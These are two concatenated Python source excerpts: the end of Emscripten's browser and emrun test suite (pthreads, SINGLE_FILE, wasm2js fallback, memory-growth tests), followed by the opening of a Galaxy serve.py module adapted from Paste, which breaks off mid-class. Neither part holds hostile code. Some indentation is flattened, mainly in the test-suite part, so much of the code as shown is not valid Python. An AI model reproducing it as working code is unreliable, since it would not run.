def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
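  # Rough sketch of the API pair being tested (hypothetical snippet, not the test source):
  #
  #   emscripten_set_canvas_element_size("#canvas", 600, 400);
  #   int w, h;
  #   emscripten_get_canvas_element_size("#canvas", &w, &h);   // expect w == 600, h == 400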
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME=1', '-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
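  # The loader page is expected to do roughly the following (hypothetical sketch of
  # main_js_as_blob_loader.html, not its actual contents):
  #
  #   fetch('hello_thread_with_blob_url.js')
  #     .then(function(r) { return r.text(); })
  #     .then(function(text) {
  #       var url = URL.createObjectURL(new Blob([text], { type: 'application/javascript' }));
  #       var s = document.createElement('script'); s.src = url; document.body.appendChild(s);
  #     });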
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE=1'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME=1', '-s', 'SINGLE_FILE=1', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
  # Similar to `test_browser_run_from_different_directory`, but here we also eval the
  # initial code, so currentScript is not present. That prevents us from finding the file
  # in a subdir, but here we at least check we do not regress compared to the normal case
  # of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind'] + self.get_async_args())
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE=1'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE=1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION=1', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION=1', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME=1'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME=1'])
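# Background note (editorial, hedged): with -s WASM=2 the build produces both a
# .wasm binary and a wasm2js JavaScript fallback (.wasm.js), and the generated
# loader picks one at runtime based on whether the browser exposes WebAssembly.
# The two tests below exercise both sides of that choice.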
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in the VM and try again. It should still work via the Wasm2js fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file; that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@unittest.skip("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# The specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. Often that occurred within 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS=1', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_emrun(self):
self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory that the suite cleans up afterwards, since the
# launched browser will use that directory as its startup directory, and the browser does not
# close as part of the test. That pins down the cwd on Windows and would make the directory
# impossible to delete. Therefore switch away from it before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading; to maintain compatibility we've internalized some of that
# code here, stripping out unneeded functionality.
# All top level imports from each package moved here and organized
from __future__ import print_function
import atexit
import errno
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from six.moves import configparser
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
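# Illustrative sketch (not part of the original module), showing how
# BoolOptionParser differs from plain optparse for boolean flags; the demo
# parser and option names below are assumptions for the example only:
#
# demo = BoolOptionParser()
# demo.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False)
# opts, _rest = demo.parse_args(['--verbose=true'])   # accepted; opts.verbose == True
# opts, _rest = demo.parse_args(['--verbose=false'])  # option is skipped; opts.verbose stays False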
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
